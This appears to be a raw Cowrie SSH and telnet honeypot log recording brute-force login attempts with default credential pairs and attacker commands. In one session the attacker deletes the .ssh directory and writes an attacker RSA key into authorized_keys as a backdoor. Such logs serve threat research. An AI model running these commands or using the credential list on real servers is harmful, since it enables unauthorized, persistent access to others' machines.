25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:37:19.123006Z","src_ip":"212.227.235.229","session":"13b362b1fc72"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:37:20.035909Z","src_ip":"212.227.235.229","session":"13b362b1fc72"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:37:20.265710Z","src_ip":"212.227.235.229","session":"13b362b1fc72"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:37:20.268188Z","src_ip":"212.227.235.229","session":"e70439c0815c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56212,"dst_ip":"1.2.3.4","dst_port":22,"session":"540df1945268","protocol":"ssh","message":"New connection: 212.227.235.229:56212 (1.2.3.4:22) [session: 540df1945268]","sensor":"my-vps","timestamp":"2025-09-09T01:37:27.982923Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:37:27.983687Z","src_ip":"212.227.235.229","session":"540df1945268"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:37:28.294506Z","src_ip":"212.227.235.229","session":"540df1945268"}
{"eventid":"cowrie.login.failed","username":"support","password":"111","message":"login attempt [support/111] failed","sensor":"my-vps","timestamp":"2025-09-09T01:37:29.575452Z","src_ip":"212.227.235.229","session":"540df1945268"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:37:30.888549Z","src_ip":"212.227.235.229","session":"540df1945268"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50870,"dst_ip":"1.2.3.4","dst_port":22,"session":"413efdacae24","protocol":"ssh","message":"New connection: 212.227.235.229:50870 (1.2.3.4:22) [session: 413efdacae24]","sensor":"my-vps","timestamp":"2025-09-09T01:37:39.879000Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:37:39.879915Z","src_ip":"212.227.235.229","session":"413efdacae24"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:37:40.141543Z","src_ip":"212.227.235.229","session":"413efdacae24"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123qweASD","message":"login attempt [admin/123qweASD] failed","sensor":"my-vps","timestamp":"2025-09-09T01:37:41.229605Z","src_ip":"212.227.235.229","session":"413efdacae24"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:37:42.495543Z","src_ip":"212.227.235.229","session":"413efdacae24"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44818,"dst_ip":"1.2.3.4","dst_port":22,"session":"6461f0588426","protocol":"ssh","message":"New connection: 212.227.235.229:44818 (1.2.3.4:22) [session: 6461f0588426]","sensor":"my-vps","timestamp":"2025-09-09T01:37:43.813252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:37:43.814125Z","src_ip":"212.227.235.229","session":"6461f0588426"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:37:43.934216Z","src_ip":"212.227.235.229","session":"6461f0588426"}
{"eventid":"cowrie.login.success","username":"root","password":"None","message":"login attempt [root/None] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:37:44.452356Z","src_ip":"212.227.235.229","session":"6461f0588426"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:37:44.762834Z","src_ip":"212.227.235.229","session":"6461f0588426"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:37:44.763521Z","src_ip":"212.227.235.229","session":"6461f0588426"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:37:44.764744Z","src_ip":"212.227.235.229","session":"6461f0588426"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:37:44.885264Z","src_ip":"212.227.235.229","session":"6461f0588426"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:37:45.182521Z","src_ip":"212.227.235.229","session":"6461f0588426"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:37:45.183351Z","src_ip":"212.227.235.229","session":"6461f0588426"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:37:45.305379Z","src_ip":"212.227.235.229","session":"6461f0588426"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:37:45.306225Z","src_ip":"212.227.235.229","session":"6461f0588426"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44826,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a8a8a7cb888","protocol":"ssh","message":"New connection: 212.227.235.229:44826 (1.2.3.4:22) [session: 7a8a8a7cb888]","sensor":"my-vps","timestamp":"2025-09-09T01:37:45.423469Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:37:45.424689Z","src_ip":"212.227.235.229","session":"7a8a8a7cb888"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:37:45.543828Z","src_ip":"212.227.235.229","session":"7a8a8a7cb888"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:37:46.061806Z","src_ip":"212.227.235.229","session":"7a8a8a7cb888"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:37:47.182817Z","src_ip":"212.227.235.229","session":"7a8a8a7cb888"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50114,"dst_ip":"1.2.3.4","dst_port":22,"session":"08369e87e702","protocol":"ssh","message":"New connection: 212.227.235.229:50114 (1.2.3.4:22) [session: 08369e87e702]","sensor":"my-vps","timestamp":"2025-09-09T01:37:47.299680Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:37:47.300286Z","src_ip":"212.227.235.229","session":"08369e87e702"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:37:47.418392Z","src_ip":"212.227.235.229","session":"08369e87e702"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:37:47.932201Z","src_ip":"212.227.235.229","session":"08369e87e702"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:37:48.051220Z","src_ip":"212.227.235.229","session":"08369e87e702"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:37:48.052245Z","src_ip":"212.227.235.229","session":"6461f0588426"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52066,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3bbd8428921","protocol":"ssh","message":"New connection: 212.227.235.229:52066 (1.2.3.4:22) [session: a3bbd8428921]","sensor":"my-vps","timestamp":"2025-09-09T01:37:56.623600Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:37:56.624508Z","src_ip":"212.227.235.229","session":"a3bbd8428921"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:37:56.879202Z","src_ip":"212.227.235.229","session":"a3bbd8428921"}
{"eventid":"cowrie.login.failed","username":"acer","password":"1234567","message":"login attempt [acer/1234567] failed","sensor":"my-vps","timestamp":"2025-09-09T01:38:00.349971Z","src_ip":"212.227.235.229","session":"a3bbd8428921"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:38:01.607518Z","src_ip":"212.227.235.229","session":"a3bbd8428921"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44460,"dst_ip":"1.2.3.4","dst_port":22,"session":"d47d91ce593f","protocol":"ssh","message":"New connection: 212.227.235.229:44460 (1.2.3.4:22) [session: d47d91ce593f]","sensor":"my-vps","timestamp":"2025-09-09T01:38:22.131522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:38:22.132468Z","src_ip":"212.227.235.229","session":"d47d91ce593f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:38:22.356781Z","src_ip":"212.227.235.229","session":"d47d91ce593f"}
{"eventid":"cowrie.login.failed","username":"support","password":"111","message":"login attempt [support/111] failed","sensor":"my-vps","timestamp":"2025-09-09T01:38:23.251669Z","src_ip":"212.227.235.229","session":"d47d91ce593f"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:38:24.479770Z","src_ip":"212.227.235.229","session":"d47d91ce593f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40404,"dst_ip":"1.2.3.4","dst_port":22,"session":"9270fa0c17b5","protocol":"ssh","message":"New connection: 212.227.235.229:40404 (1.2.3.4:22) [session: 9270fa0c17b5]","sensor":"my-vps","timestamp":"2025-09-09T01:38:24.909498Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:38:24.910508Z","src_ip":"212.227.235.229","session":"9270fa0c17b5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:38:25.150975Z","src_ip":"212.227.235.229","session":"9270fa0c17b5"}
{"eventid":"cowrie.login.failed","username":"ahmad","password":"12345678","message":"login attempt [ahmad/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T01:38:26.158216Z","src_ip":"212.227.235.229","session":"9270fa0c17b5"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:38:27.401761Z","src_ip":"212.227.235.229","session":"9270fa0c17b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39886,"dst_ip":"1.2.3.4","dst_port":23,"session":"2a6dbe2d615a","protocol":"telnet","message":"New connection: 212.227.125.160:39886 (1.2.3.4:23) [session: 2a6dbe2d615a]","sensor":"my-vps","timestamp":"2025-09-09T01:38:28.881903Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:38:28.967122Z","src_ip":"212.227.125.160","session":"2a6dbe2d615a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:38:28.987490Z","src_ip":"212.227.125.160","session":"2a6dbe2d615a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44783,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc55fd3a31c2","protocol":"ssh","message":"New connection: 212.227.235.229:44783 (1.2.3.4:22) [session: dc55fd3a31c2]","sensor":"my-vps","timestamp":"2025-09-09T01:38:29.900708Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:38:29.901474Z","src_ip":"212.227.235.229","session":"dc55fd3a31c2"}
